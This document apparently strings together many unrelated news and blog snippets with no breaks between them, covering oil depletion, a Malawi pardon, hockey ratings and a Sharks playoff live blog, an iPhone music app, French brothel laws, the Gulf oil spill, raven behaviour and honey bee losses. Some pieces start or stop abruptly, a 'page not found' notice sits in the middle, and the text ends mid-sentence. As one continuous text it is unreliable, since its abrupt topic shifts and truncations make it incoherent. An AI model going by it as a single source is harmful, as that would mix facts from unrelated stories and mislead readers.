But for the world as a whole , there seems to be a close relationship between growth in oil consumption and GDP growth .
Since finance and some other services do n't need much oil to grow , the relationship is not exactly 1:1 .
Efficiency growth would also tend to make GDP growth higher ( but declining energy return on investment would tend to lower it ) .
My big concern is international trade .
If debt defaults are a problem , this could interfere with the workings of the whole system , especially if it leads to major countries ( perhaps Greece ) defaulting on their debts .
In the years since fossil fuel use has developed , world population has greatly expanded .
We are already seeing problems with people in some of the poorer nations having adequate food .
Even in the US , there are people at the margins who are " food insecure " .
Currently , there are government programs to help , but states are finding it increasingly necessary to cut back , because of falling tax revenue .
It would be a lot easier to get politicians to talk about the situation if there were a good solution in sight .
There are some partial mitigations , but they likely do n't get us back to " business as usual " .
Voters are likely to be very unreceptive to such news .
We are in the midst of a predicament , even if we continue to ramp up deep water oil from the Gulf of Mexico .
If there is less oil from the Gulf of Mexico , it will make our predicament even worse .
The world does n't really have many more good , cheap places to drill any more .
Any place we do drill , requires substantial capital investment and long lead times .
Much of the remaining oil is in solid form , like the oil sands , and oil shale .
Such resources will be very slow to extract , so it is very difficult to ramp them up , even if we decided we wanted to .
There may be other limiting resources as well , such as water , meaning that this obstacle needs to be overcome as well .
So there are no easy substitutes for oil from the Gulf of Mexico .
Sorry but the page you are looking for does not exist .
Try searching The Global Urbanist for the page you are after :
With almost 3 percent of homes in the nation 's metered markets tuned in , NBC's Saturday - night coverage of Stanley Cup finals opener between the Chicago Blackhawks and Philadelphia Flyers scored the highest overnight TV ratings for a Game 1 since 1999 .
That 2.8 overnight household rating represents a 12 percent increase over Game 1 of last year 's National Hockey League title series between Pittsburgh and Detroit , which was on a Saturday night not on Memorial Day weekend .
But it pales in comparison to TNT 's 5.8 overnight household rating for Saturday night 's decisive Western Conference finals Game 6 in which the Los Angeles Lakers defeated the Phoenix Suns to earn a matchup with the Boston Celtics in the National Basketball Association finals beginning Thursday .
In Chicago , on WMAQ - Ch.
5 , Saturday 's game averaged a 16.8 household rating ( which translates to more than 588,000 area homes ) and 35 percent of all homes watching TV at the time .
That 's their highest ratings in recent memory , although only a little more than half what the Chicago Bears drew for their prime - time December overtime regular - season football victory over Minnesota .
We know that the launch of the myTouch 3G Slide is coming before the EVO 4G hits Sprint stores , but we thought we would cover a bit more EVO news since all the myTouch Slide news came in more than a month ago and it feels like the phone has already been on the market for a while .
That being said , Android and Me has just posted a video , showing how the HDMI connection on the HTC EVO 4G works .
For those hoping to get the same functionality as the VGA output on the DROID Incredible or the older Touch Pro models from HTC , you might be a little disappointed .
The HDMI output on the EVO 4G only seems to work with the video and gallery apps on the Android phone .
Commenters pointed out that developers could add in a few hacks to enable “ VideoView ” in their applications , but it sounds like it may be a little more hassle than what it ’s worth .
Honestly , users could gain a whole lot more functionality if HTC removed that HDMI port and added DLNA support to users could browser and share pictures , music , and video over their home network .
Source : Android and Me
( CNN ) --
The president of Malawi has pardoned two gay men who were sentenced to 14 years in prison this month for gross indecency and unnatural acts , the country 's solicitor general , Anthony Kamanga , said Saturday .
President Bingu wa Mutharika announced his pardon of Steven Monjeza and Tiwonge Chimbalanga after meeting with U.N. Secretary General Ban Ki-moon , Kamanga said .
Authorities arrested Monjeza and Chimbalanga in December at their home in Blantyre , Malawi after the couple professed their love in a traditional engagement ceremony .
Police discovered the couple when local newspapers reported on their engagement ceremony .
The criminal case against them cast a light on prevailing African attitudes toward homosexuality , which is outlawed in more than 30 nations on the continent .
The White House said it is pleased to learn of the pardon , stressing that the people are " not criminals and their struggle is not unique . "
" We must all recommit ourselves to ending the persecution and criminalization of sexual orientation and gender identity .
We hope that President Mutharika 's pardon marks the beginning of a new dialogue which reflects the country 's history of tolerance and a new day for lesbian , gay , bisexual , and transgender rights in Malawi and around the globe , " it said .
Welcoming the action , the British government said , " Human rights apply to everyone regardless of their sexual orientation or gender identity . "
" Britain has a close and strong partnership with Malawi and it is in this spirit that we raised our concerns about these convictions with the Government of Malawi , " Britain said in a statement .
Some in the conservative southern African nation of Malawi supported the prosecution , and government officials have said they were simply upholding the law .
Human rights groups and advocates for gays and lesbians argued that the arrests violated Malawi 's constitution , which outlaws discrimination .
Monjeza and Chimbalanga are in their 20s .
While they were awaiting trial , they were subjected to medical examinations intended to find evidence of sodomy , according to Human Rights Watch .
They also underwent psychiatric evaluations .
All the exams were done without the men's consent , the group said .
The director of an organization that helped provide legal support to the couple , Gift Trapence of the Center for the Development of People , welcomed the news .
The president 's decision provides an example to African governments and the world in general , he said .
Frederick Frankenstein :
MY GRANDFATHERS ' WORK WAS DOO - DOO !
I AM NOT INTERESTED IN DEATH !
THE ONLY THING THAT INTERESTS ME IS THE PRESERVATION OF LIFE .
( stabs himself in the leg with a scalpel ) Class is dismissed .
- Frederick Frankenstein
Macs may have supported the two - button mouse well before Portal came free with Steam on Mac , but that makes this comic no bit less funny .
[ googpeg via digg ]
Advertisement
Today was a big day for HTML5 .
It was topic A , B , and C at Google 's big " I/ O " developers conference .
( What 's HTML5 ?
Basically , the next version of the coding for web .
It aims to eliminate the need for web plug-ins like Adobe Flash .
Instead , the functionality of Adobe 's Flash platform will be available right in the code of the web . )
The gradual elimination of Flash sounds like a bad thing for Adobe , but it 's actually not a huge problem .
From a revenue perspective , Flash only accounted for 7 % of the company 's revenue in fiscal 2009 , or $ 231.2 million , according to Citi analyst Walter Pritchard .
While losing a revenue source is never a good thing , the widespread adoption of HTML5 can actually be good for Adobe .
The company is introducing a bunch of tools for web developers to make HTML5 sites .
Its Dreamweaver software , in particular , is getting an update to help web designers .
There 's no reason that Adobe could n't even built an " export to HTML5 " command in Flash .
As HTML5 grows , Adobe can offer new tools , and thus drive revenue growth .
Both Flash and Dreamweaver are part of Adobe 's core business -- " Creative Solutions " -- which generated half of Adobe 's revenue last quarter .
Follow the Chart Of The Day on Twitter : www.twitter.com/chartoftheday
When Microsoft Songsmith promised to provide a custom backing track to anything that you sang , the Series of Tubes known as the Internet quickly used the tool to record versions of popular songs .
They were laughably bad , filled with cheesy beats and backing synths plucking out " oom - pa- pa " rhythms .
As a research problem , Songsmith was a success ; as a creative tool , it was ( let 's just admit it ) a big fat failure .
But Parag Chordia , the director of the Music Intelligence Lab at Georgia Tech , sees promise in such tools , enough so that he turned his own research into an iPhone app called LaDiDa that takes what Songsmith did and makes it mobile ... and cool .
The education of a digital sideman
" LaDiDa in a way encapsulates all my interests , " Chordia tells Ars .
His research projects to date have focused on machine listening and computational creativity , but Chordia also plays Indian classical music and is committed to making music more participatory .
Chordia and some of his fellow professors have spun off a company from their Georgia Tech research to commercialize tools that make it easy even for non-musicians to create tunes .
The success of games like Rock Band and Guitar Hero were the first wave ; they tapped into the primal rush that comes from creating music , but they did n't allow actual creation .
LaDiDa tries to enable this by providing sophisticated backing tracks in various styles .
Sing into the iPhone over a metronomic beat , and the software figures out what key you 're in , what mode is being used ( major , minor , mixolydian , etc. ) , whether song sections are being repeated , and what chord progressions might work well underneath the melody line .
Rather than programming this knowledge into the software , Chordia and his team instead fed it huge amounts of data .
Their machine learning program was given a huge song database in MIDI format and set to work on analyzing the data to learn just how songs are built .
" We do n't give it any rules , " says Chordia .
Instead , the goal was to find out whether " we can train a computer to learn by example . "
The software developed a statistical model of pop music — what chord progressions match up with which melody notes , what arpeggios and instruments to use , how songs are structured .
The engine was now ready to be " run forward , " to generate music out the individual backing tracks out of musical samples created by a composer on Chordia 's team .
To create the music , the software first turns someone 's singing from pressure waves into pitches .
The result is a data set of pitch match against time , which does n't tell the computer much until several key analyses are performed .
What key is the song in ?
( Humans may sing in all sorts of non-chromatic keys , starting a quarter tone up from Middle C , for instance . )
What mode is the song in ?
( Major , minor , etc. )
Are there any repeating structural elements ?
( Verse , chorus . )
The software then creates a backing track in one of several predefined styles .
An internal sampler / sequencer creates the music , altering pitch and rhythm to match the proper tempo and key signature .
It then applies an optional autotune effect to the original singer and a bit of reverb ; the whole piece is then played back and can be e-mailed or posted to Twitter or Facebook .
Comparing the product against Microsoft 's research project , Chordia says that LaDiDa just sounds better .
" To do this kind of thing successfully , it 's not just a technology play ; it requires musical aesthetics , " he says .
In addition , modeling the songs has advanced significantly , and " our models are better . "
If the end result does n't sound fantastic , people wo n't use the product ; they might even take to mocking it on YouTube .
Changing the world
Is LaDiDa really a " new paradigm for creating music , " as Chordia argues ?
After playing with the software for several days , we 're not convinced that an iPhone can really change the world , but it 's undeniably fun to mess around with the software .
While capable of generating some good results , it 's hugely important to sing with the metronome ; unfortunately , our version consistently had sound output problems that made the metronome glitch out during playback .
( A reboot seemed to clear things up . )
Also , we quickly learned that producing backing tracks to existing tunes can be a bad , even terrible idea .
Let 's just say that there now exists in some dark corner of my iPhone a version of " Danny Boy " so execrable that it makes Vogon poetry sound like Shakespeare .
( The CEO of khu.sh , the company that produces LaDiDa , appears to get better results ) .
But when it comes to noodling around with new ideas , the software is a blast .
Singing the first paragraph of this very article into LaDiDa produced something that , while perhaps not " music " is any real sense , does not make one 's ears bleed .
( Well , not much .
Listen if you dare . )
The software also produces backing tracks to any melody line played on musical instruments , as we discovered when coming across someone 's Star - Trek - theme - song - plucked - on - guitar .
The design is simple , meant to be " low floor , high ceiling . "
That is , anyone can use the program without any real knowledge of music or software , but it 's meant to be useful to those with such experience .
In Chordia 's view , music creation has been too much of an elite activity , and he 's out to go all Web 2.0 on songwriting .
" Just as journalism is being transformed by tools that enable users , music will be transformed too , " he says .
The first wave was home production studios , laptop tools like Logic and Reason , but the next wave will be " broader and much more profound . "
It will enable to average person , even those without musical training , to truly make music .
The music " business " is an anomaly ; looked at historically , " very few cultures have done it this way . "
Chordia wants to reconnect people with music , and his team has already extended its engine beyond the iPhone .
Next up : a Web service that provides similar tools for webcam users .
Sing it your computer from anywhere on the planet and get back not just a song but a music video .
Further down the line , truly collaborative music making with such tools may be possible , with one person generating the rhythm , another performing the solo .
The music may also get more real - time , generating live accompaniment as you sing .
For now , though , the team has LaDiDa , an iPhone app going for $ 2.99 a pop .
It plans to sell more " styles " from within the app , even launching a dev program where artists can create their own custom musical styles ( and sell them ) .
LaDiDa may not yet be a truly serious music creation tool , but it's not hard to envision a day in the future when anyone with a decent voice , some autotuning , and a computerized backing band starts climbing up the pop charts .
When that happens , Chordia — and Microsoft — will have had something to do with it .
PARIS , France — A French lawmaker wants to reopen brothels , outlawed in France since 1946 , in order to protect prostitutes from predatory pimps and exploitation .
But the sex workers say no thanks .
“ All of the prostitutes are against the reopening of the brothels , ” said Janine Mossuz - Lavau , a sociologist and expert on sexuality and prostitution .
A 2003 law introduced by then - Interior Minister Nicolas Sarkozy , which made passive public solicitation a punishable crime , is partly to blame for the impasse .
Criminalizing activities around prostitution , which itself is legal for anyone over 18 , sent workers underground to massage parlors and bars , but also away from the city centers , to peripheral areas , the woods and the internet .
It “ rendered exercising this profession much more dangerous ” since workers found themselves isolated , Mossuz - Lavau said .
Almost seven years to the day that parliament adopted that law in March 2003 , Chantal Brunel , a member of Sarkozy ’s UMP party who had voted for it , announced she wants to change the government ’s response to prostitution .
She envisions reopening the brothels as spaces where workers would be safe from human trafficking and violence , treated with dignity and would even receive medical care .
An estimated 59 percent of French citizens support the idea , according to a poll released last month .
But the sex workers ’ union , which represents more than 250 prostitutes in France , is adamantly opposed to government meddling in its business and would rather maintain as much independence over its members ' livelihoods as possible .
Reached by phone , Tiphaine Besnard , a union spokeswoman , said it had been a while since she heard any news from government officials one way or another about how the matter was progressing .
In any case , the workers rarely participate in political discussions or decisions involving them .
“ Our elected officials … are doomed to repeat the same failures if they do not consult the people who live prostitution daily and know all the consequences of their policies , ” the union said in a March press release .
“ We alone possess the expertise on our lives . ”
Among the reasons the union cites for opposing the government ’s proposal is the fear that brothel keepers who want to receive a cut of their proceeds would exploit the workers .
Plus , the union argues , mandatory testing for sexually transmitted diseases could lead to discriminatory policies that might bar those infected from working .
Instances of HIV in the pornography industry has led politicians to ask if they should be doing more to police that industry — a scenario prostitutes would like to avoid .
They are also against a system that might divide workers into camps of regular brothel workers and others who refuse to work within that system .
For Alain Plumey , a 62 - year - old erotic art collector whose Museum of Eroticism contains substantial documentation on the brothels of the 19th and 20th centuries , it is no surprise that the debate over reopening the pleasure houses is resurfacing , as it does every few years .
“ The more difficult life is , the more prostitution is practiced , ” he said “ And right now , life is difficult . ”
Surrounded by memorabilia from the permanent exhibit detailing the history of brothels in France , Plumey spouted out facts while pointing to a register from the early 1940s that itemized how many clients or “ passes ” one prostitute had in a day .
When the description of “ Jewish ” was noted in the log , he said it meant that a Star of David the client wore was used to identify him .
Most houses had one black prostitute or a woman who walked with a limp — exotic qualities to clients .
By 1946 , the brothels had closed indefinitely after experiencing years of stricter police controls .
Plumey ’s 13 - year - old museum , located in the heart of the red light district near the Moulin Rouge cabaret , is also filled with phallic artifacts and sculptures from all over the world , vintage pornographic films as well as modern art with a sexual theme .
But the permanent exhibit on brothels , which occupies the entire second floor of the seven - story museum , is an essential feature because the subject fascinates , he said .
“ Tariffed sexual relations equally belong to the domain of fantasy and eroticism . ”
The government proposal to reopen the establishments is problematic on many fronts , Plumey said .
He called it “ total nonsense ” that the simple act of idling too long in a certain location can land someone in jail for solicitation .
But stepping in to run the brothels would put the government on the wrong side of the law , since pimping is illegal .
No government has ever been able to eradicate prostitution , a profession most people practice out of necessity and not out of choice .
Stamping out poverty or at least devoting more time to analyzing the subject in the press might be a step in the right direction , he said .
“ We have to treat the causes , not the effects , ” Plumey said .
“ Politicians pretend to treat the effects without taking care of the causes . ”
Several state lawmakers in Louisiana are ramping up their calls for the state and the federal government to relieve BP of its authority in the Gulf oil spill cleanup .
The three week - old environmental crisis took on new urgency last weekend as oil moved west of the Mississippi River and threatened Barataria , Terrebonne , and Atchafalaya bays , as well as the wetlands of Jefferson , Lafourche , and Terrebonne parishes – among the state ’s most fertile fisheries .
Under current official structure , BP is directing operations to contain the slick while it also works to stop the gushing oil well 50 miles offshore and nearly a mile below the ocean surface .
Each coastal parish is drawing up its own plan to defend its coastline , but it needs final approval from BP and the Coast Guard .
BP is also in charge of supplying the effort with containment materials such as boom , which is becoming increasingly difficult to find .
IN PICTURES : Louisiana oil spill
" We ’re at the point where we ’re going to have to break some rules to save ourselves , ” says state Rep. Sam Jones of St. Mary Parish , which includes Atchafalaya Bay .
“ We ’re relying on a private company that seems to be overwhelmed . ”
The solution , he says , is obvious : “ We need to handle this like a hurricane , with the governor ’s office in Baton Rouge in charge . ”
Local officials declared states of emergency as Gulf water areas in Jefferson , Lafourche , and Terrebonne parishes were closed to harvesting fish , shrimp , and oysters .
The National Oceanic and Atmospheric Administration ( NOAA ) predicted landfall for oil along Grand Isle and Port Fourchon by Tuesday , but the oil slick remains several miles offshore .
So far , no oil has been spotted on area beaches .
The bid to prevent oil from coming ashore in the parishes continues .
In Jefferson Parish , parish workers , the Coast Guard , and Louisiana National Guardsmen in Grand Isle are scrambling to protect inland waters with sand berms and deflection booms .
Parish council member John Young called for state intervention .
“ The US government and the state need to step in and take over from BP , ” says Mr. Young .
“ We should be responsible for our own plan as far as getting approval for defending our coast . ”
In Terrebonne Parish , BP and the Coast Guard have established a response headquarters in the fishing hamlet of Cocodrie , where hurricane Gustave made landfall in September 2008 .
But much still depends on BP 's future responsiveness .
“ Our response plan was approved by the Coast Guard and by the responsible party , ” said Terrebonne public safety officer Ralph Mitchell , referring to BP .
“ The oil is still offshore and we have n’t seen any yet .
We have some boom out and we ’re waiting for more .
The parish is n’t responsible for getting it .
We have to wait on BP . ”
In Lafourche Parish , efforts are focused on sandbagging beaches at Port Fourchon and building a floating decontamination area , where oil from the spill can be cleaned off incoming ships before they enter the port .
Port Fourchon handles 18 percent of the shipping traffic associated with domestic oil production in the US , some ships traveling 50 miles up Bayou Lafourche to Lockport , La .
Its vibrant fishing community is worried about contamination in inland waterways .
“ If you drive Highway 1 up to Lockport , you ’ll see fisherman lining the bayou the whole way , ” said Brennan Matherne , public information officer for the parish .
“ There ’re thousands of people here who make their living off oysters , shrimp , and fish .
Oil going up the bayou would n’t be good for any of us . "
IN PICTURES : Louisiana oil spill
Related :
AVALANCHE at SHARKS
GAME 5 WESTERN CONFERENCE QUARTER -FINALS
4/22/10
FINAL
SHARKS -5 , Avalanche-0
San Jose leads series 3 - 2
Game 6 Saturday 7 pm Pacific at Pepsi Center
Three Stars
1. Nabokov ( 7th career Stanley Cup playoff shutout )
2. Couture ( 2 Goals , +2 )
3. Setoguchi ( 2 Assists , +1 )
3rd PERIOD
20:00 Nabokov records his 7th career playoff shutout ( last : 4/10/08 vs Calgary ) and second career against Colorado as the Sharks win Game 5 and take a 3 - 2 series lead .
It is the largest margain of victory in a playoff game in San Jose franchise history .
San Jose plays an outstanding sixty minutes of hockey and dominates the Avs for the home ice win ; just a super performance by everyone with 11 different players registering points .
Colorado outshoots the Sharks 17 - 8 in the third , but for the fourth straight game San Jose outshoots the Avs in a game ( 37 - 28 ) .
18:46 Hendricks blasts a one - timer from the right circle off the crossbar , second clang of the night for the Avs .
18:00 Nichol heads back into the sin bin , this time for holding .
16:09 Nichol is out after the Sharks killed off the very brief power play of six seconds .
14:09 Nichol is called for slashing Yelle , ending the Sharks five minute power play .
13:24 Sharks get their second power play goal of the night and make it 5 - 0 ; Marleau gets his first of the playoffs and his 38th career Stanley Cup playoff goal ( most in Sharks history ) .
Marleau stationed at the right edge of the crease deflects a Heatley from between the circles shot top shelf .
SJ PP GOAL : Marleau ( 1 ) A : Heatley 2( 3 ) , Demers ( 1 ) at 13:24
11:04 McLeod is called for a major penalty , charging McGinn along the boards in the San Jose zone giving the Sharks a five minute power play .
How Tucker did not get a penalty also is beyond me as he elbowed McGinn in the back of the head while McGinn was on his knees trying to get up .
A big scrum immediately with Nichol getting in the face of Tucker .
Joe Sacco pulls Anderson and puts Peter Budaj in goal .
10:37 Couture gets his second of the night as the Sharks make it 4 - 0 .
Couture knocked home a rebound from Clowe 's shot from down low left with Anderson out of position because of the initial save .
Setoguchi made the play by just staying onside at the left boards in front of the Avs bench .
SJ PP GOAL : Couture 2 ( 2 ) A : Clowe ( 5 ) , Setoguchi 2 ( 3 ) at 10:37
8:27 Quincey comes out of the box as the Sharks had two shots on the power play .
6:27 Quincey called for interference on Heatley in the Colorado zone giving the Sharks their fifth power play of the night .
6:17 The NHL just announced that Game 6 of the series at the Pepsi Center on Saturday will begin at 7 pm Pacific time and at 8 pm in Denver .
2:45 Nabokov has made two key saves and maybe his best of the night when he stacked the pads at the left edge of the crease on Tucker .
2:22 Demers exits the box and the Sharks have killed off the penalty .
0:52 Tucker comes out of the penalty box and the Avs will have their first power play of the night ; it will be a shorter one of 1:30 .
0:22 Demers is called for hoding Stastny ending the Sharks power play and we 'll skate four on four .
0:00 Sharks will start the period with : 52 left on a power play that carries over from the second with Tucker serving the Hannan extra penalty .
2nd PERIOD
20:00 Second period ends and it's not soon enough for the Avs who surrender three goals in the period .
Sharks outshoot the Avs 17 - 9 and lead for the game 29 - 11 .
It all begins on the draw as the Sharks are winning 64 % of the face - offs with Malhotra winning eight of his ten and Pavelski seven of his ten , conversely Duchene was won only one of his seven .
Sharks are sticking to the gameplan and taking it to the Avalanche .
18:52 Wild scrum and punches thrown behind Nabokov after a big collision at the Sharks net will result in another San Jose power play .
Out of the pile , Hannan gets four minutes for roughing and McGinn ends up with two minutes .
Nabby was shaken up momentarily but is okay after getting looked at by Sharks Athletic Trainer Ray Tufts ; the San Jose goalie was run into by Murray who was cross-checked by McLeod .
A vicious hit that should have been called , but was not , the Avs frustration is mounting .
15:30 Sharks score again and sends HP Pavilion into a frenzy ; it 's the energy line that gives a jolt .
Nichol slammed a shot from the high slot off the boards to the left of Anderson that bounced in front and Helminen scored his first Stanley Cup playoff goal to make it 3 - 0 .
Nichol using the home ice advantage and capitalizing on the lively boards at The Tank .
SJ GOAL : Helminen ( 1 ) A : Nichol ( 1 ) , Murray ( 2 ) at 15:30
15:00 The Sharks are really flying and taking it to the Avs , shots are now 24 - 7 San Jose .
11:37 Sharks goal is waved off and the score remains 2 - 0 .
Clowe with a slapshot driving up the left side is saved by Anderson , but then Setoguchi driving the net was knocked off balance , went crashing into the Colorado goalie and both went into the net with the puck .
10:21 Sharks do n't waste anytime and record a power play goal .
Off the draw , the Sharks win it back and it's Captain America for the Sharks tallying another goal .
Pavelski with a blast from the high slot beats Anderson glove side to put the Sharks up 2 - 0 .
Boyle with the primary assist , fed the puck to Pavelski from the top of the right circle .
Second goal for the Sharks in 1:56 and the Avs burn their time out .
SJ PP GOAL : Pavelski ( 3 ) A : Boyle ( 3 ) , Setoguchi ( 2 ) at 10:21
10:15 Galiardi called for holding - the - stick giving the Sharks their third power play .
8:25 Couture with his first career playoff goal off a redirection in front .
Marleau led the rush up the left boards , passed it cross-ice to Heatley at the top of the right circle and found Couture planted alone in front .
Couture with some great stick work , actually tipped it through Anderson with his back toward the net and through his legs .
SJ GOAL : Couture ( 1 ) A : Heatley ( 2 ) , Marleau ( 2 ) at 8:25
6:25 Helminen was denied on a hard charge pushing the puck up the right wing side and driving the net .
Anderson kicked the attempt aside with the left pad as he was down in the butterfly .
6:03 Anderson pounces on a loose puck at the top of the crease for a face - off after a nifty play by Setoguchi .
Setoguchi walked the blueline and fired a hard wrist shot toward the net that was knocked down by the blocker of Anderson and Helminen was trying to jam it home .
5:02 Avs are outshooting the Sharks 4 - 2 to begin the second ; Colorado has picked up their play so far here in the period .
1:30 Svatos 's chance driving down the slot was broken by a sliding Heatley in front of Nabokov , Avs were probably guilty of over passing .
0:40 Anderson kicks out a redirection from Mitchell in the slot with the right pad off a drive from Malhotra ; really good chance for the Sharks to begin the second .
0:00 Thornton 's line will start against Stastny 's line to open up the second .
1st PERIOD
20:00 Scoreless at the end of the first and the Sharks controlling play in the period .
San Jose outshot Colorado 12 - 2 in the period , plus the Avs blocked six more .
San Jose wih an edge on draws , winning nine of the 15 as Thornton won both of his and Malhotra won four of the six he took .
Blake led all skaters in ice time ( 8:07 ) and Heatley far and away led all forwards ( 7:46 ) ; former Shark Scott Hannan led the Avs in ice time ( 7:48 ) .
18:15 Avs cycle the puck for about 30 seconds in the Sharks zone but unable to get a shot on goal .
Vlasic with a huge hit on Duchene to help get the puck out of the zone .
16:56 Pace picking up and the action is end to end with chances both ways .
Sharks had two as Marleau 's wrist shot was bobbled by Anderson and nearly rolled in as it was behind Anderson , but Hannan knocked it out of harms way .
The Avs raced to the other end and Boyle blocked a shot in a two on two situation .
14:36 Sharks outshooting the Avs 9 - 2 at this point , although Colorado 's best chances have not been actual shots .
The post Svatos hit and just about 15 seconds ago a shot from the point bounced off both Blake and Galiardi in front and slid wide of the net .
So far the Sharks are getting some lucky bounces .
11:45 Could have been a miserable mistake for Anderson as he gives the puck right to Thornton in the right corner , but Joe misses the net from a very tough angle with the Colorado netminder out of position .
10:46 Sharks are awarded their second power play after Yip is called for cross-checking Couture .
8:50 Avs ring one off the post , from the right circle Svatos blistered a wrist shot off the pipe on Nabby 's right .
8:05 Murray levels Duchene with a big hit at center ice which brings a huge cheer from the fans .
Both teams are physical .
3:35 Nabokov with a good save on a wrist shot from Galiardi from the left circle , the Avs first shot .
2:42 Quincey comes out and the Avs kill the penalty with the Sharks firing three shots on the man advantage .
0:42 Quick penalty against the Avs as Mitchell is hooked by Quincey giving the Sharks an early power play .
Similar start as Game 4 , let 's see if San Jose can similairly get an early power play tally .
0:00 Paul Devosrski drops the puck and the Sharks win the initial face - off .
PRE - GAME
7:35 pm Sharks , wearing the teal , skate through the shark head and on to the ice with Nabokov leading the way with Metallica 's " Seek and Destroy " blasting through The Tank to thunderous cheers and fans waving orange t- shirts and white pom-poms .
It is playoff loud inside HP Pavilion .
7:29 pm Thornton 's line will start for the Sharks with Murray and Boyle on defense , while the Avs will start Stastny 's line with Hannan and Quincey on the blueline .
Fred Phelps ’ band of merry revelers is going to have a busy spring season .
While they ’re already planning to picket Constance McMillen ’s graduation in Mississippi , now they ’ve got to add New Jersey to their travel schedule , thanks to a male high school student ’s cross - dressing prom plan .
Surely they want to visit his school ?
Derrek Lutz says it flat out : “ Yea , I ’m a cross dresser . ”
And he wanted to wear heels and a dress to his prom .
“ What makes me a woman is inside and it does n’t really matter what ’s on the outside .
And everyone should really just be treated equally . ”
Initially , school administrators were n’t thrilled ; they told him wearing a dress to Saturday ’s event would violate school policy .
Cue the Facebook group , some internal discussion , and things were “ resolved . ”
He posts to Facebook : “ SO we won ..
I got into prom with no problems …
I also won PROM KING !…
I ’d really love to thank you all for supporting me .
You all make me so proud to be alive and so proud to have so many people come together like this .
Thank you all so so incredibly much and if you ’d like to see tagged pics come to my facebook page . ”
Oh , did we mention Lutz last month performed this Gaga routine for the entire school ?
I ’m in awe of this kid .
Top journalists and executives will celebrate this year 's honorees .
For Linda Yaccarino - Chairman , Advertising and Partnerships , NBCUniversal - if you ’re innovating , you ’re focused on the future .
13 students are honored for their achievements in communications .
CAREER ADVICE
WHAT DOES
ALLYSHIP
REALLY MEAN ?
3 steps you can take
now to go beyond
the hashtags .
learn more
Here are three steps that you can take right now
to go beyond the hashtags and remain
committed months after the headlines change .
learn more
There ’s an allure around the Vincent brand that few other marques can match .
It ’s a potent mix of history , effortless style and brutal power that many have tried to recapture , but failed .
Most of the landmarks in Vincent history are well documented , but this muscular sprint bike was a new one to me .
‘ Super Nero ’ was built in the 1960s by a factory employee called George Brown , who ’d already made a name for himself with his original Nero motorcycle — which broke the world standing - start kilometre record by clocking 108.735 mph ( 175 kph ) .
To go one better , Brown installed a huge supercharger behind the engine of his next bike , and called it Super Nero .
According to a magazine article reprinted on the MyVincent website , “ A 2 - inch SU carburettor feeds Super Nero ’s supercharger , which was run at clutch speed to give a theoretical boost of 12.75 lbs [ 0.88 bar ] .
The 1500 cc engine used standard Rapide touring cams , high lift rockers and a compression ratio of 8:1 compared to Nero ’s 13:1 . ”
I can just imagine the sound and fury .
The output of Super Nero was reportedly 125 bhp , and in 1967 Brown piloted the bike you see in these pictures to a world standing - start mile record of 128.665 mph ( 207k ph ) .
Best of all , the bikes survive : you can see both Nero and Super Nero in the National Motorcycle Museum in the UK .
Photo credits : cutaway image ( above ) via Le Container .
George Brown launching Super Nero ( below ) from MyVincent .
Next two images via Pete Crane .
Final color shot from Paul Norman ’s Racing Vincent .
All sites worth visiting .
After ravens see a friend get a beat down , they approach the victim and appear to console it , according to new research .
Orlaith Fraser and her co-author Thomas Bugnyar watched the aftermath of 152 fights over a two year period between 13 hand - reared young adult ravens housed at the Konrad Lorenz Research Station in Austria .
What they found was the first evidence for birds consoling one another .
" It 's not a good thing for your partner to be distressed , " Fraser explained .
" It 's interesting to see these behaviors in animals other than chimpanzees .
It seems to be more ingrained in evolutionary history . "
And there might be a bit of self - interest embedded in the birds ' actions , too .
" Maybe if you are involved in a fight they might come and console you , " Fraser said .
Ravens are one species of corvid , a famously smart group of birds , so they are natural study subjects for researchers probing the uniqueness of mammalian behaviors like empathetic consolation .
The consolation of fight victims has only been definitely shown in chimpanzees and bonobos .
Recent studies show similar behaviors in dogs and wolves , but how consolation works in those animals has n't been tested .
Bugnyar noted which ravens were involved in the fights and how bad the fights were .
They classified the animals into three categories for each altercation : aggressors , victims and bystanders .
They noticed that those birds with whom the victim spent a lot of time were most likely to approach it after a fight .
A victim's " friends " seemed to notice when it was stressed by the fight , said Fraser .
" The findings of this study represent an important step towards understanding how ravens manage their social relationships and balance the costs of group - living , " Fraser and Bugnyar wrote .
" Furthermore , they suggest that ravens may be responsive to the emotional needs of others . "
The results from these studies were published May 12 in the open- access journal PLoS One .
Image : Flickr / ingridtaylar
See Also :
Citation : " Do Ravens Show Consolation ?
Responses to Distressed Others , " by Orlaith Fraser and Thomas Bugnyar .
PLoS one Vol. 5 Iss. 5 . DOI:10.1371/journal.pone.0010605
This release is available in Spanish .
Losses of managed honey bee colonies nationwide totaled 33.8 percent from all causes from October 2009 to April 2010 , according to a survey conducted by the Apiary Inspectors of America ( AIA ) and the Agricultural Research Service ( ARS ) .
Beekeepers identified starvation , poor weather , and weak colonies going into winter as the top reasons for mortality in their operations .
This is an increase from overall losses of 29 percent reported from a similar survey covering the winter of 2008 - 2009 , and similar to the 35.8 percent losses for the winter of 2007 - 2008 .
The continued high rate of losses are worrying , especially considering losses occurring over the summer months were not being captured , notes Jeffrey Pettis , research leader of ARS ' Bee Research Laboratory in Beltsville , Md. ARS is the U.S. Department of Agriculture 's principal intramural scientific research agency .
The survey was conducted by Pettis and past AIA presidents Dennis vanEngelsdorp and Jerry Hayes .
The three researchers said that continued losses of this magnitude are not economically sustainable for commercial beekeepers .
The 28 percent of beekeeping operations that reported some of their colonies perished without dead bees present -- a sign of Colony Collapse Disorder ( CCD ) -- lost 44 percent of their colonies .
This compares to 26 percent of beekeepers reporting such dead colonies in the 2008 - 2009 winter and 32 percent in the 2007 - 2008 winter .
Beekeepers that did not report their colonies having CCD lost 25 percent of their colonies .
As this was an interview - based survey , it was not possible to differentiate between verifiable cases of CCD and colonies lost as the result of other causes that share the " absence of dead bees " as a symptom .
The cause of CCD is still unknown .
The survey checked on about 22.4 percent of the country 's estimated 2.46 million colonies .
The survey reports only winter losses and does not capture colony losses that occur throughout the summer when queens or entire colonies fail and need to be replaced .
Those summer losses can be significant .
###
A complete analysis of the survey data will be published later this year .
The abstract can be found at http://ento. psu. edu/ pollinators / publications / losses / at_download / file
More information about CCD can be found at www.ars.usda.gov/ccd.
USDA is an equal opportunity provider , employer and lender .
To file a complaint of discrimination , write : USDA , Director , Office of Civil Rights , 1400 Independence Ave. , S.W. , Washington , D.C. 20250-9410 or call ( 800 ) 795-3272 ( voice ) , or ( 202 ) 720-6382 ( TDD ) .
Well no , not exactly , but when it comes to his comments about civil rights legislation this is about as close to a defense as Paul is likely to get from the left .
Here 's Alexander Cockburn :
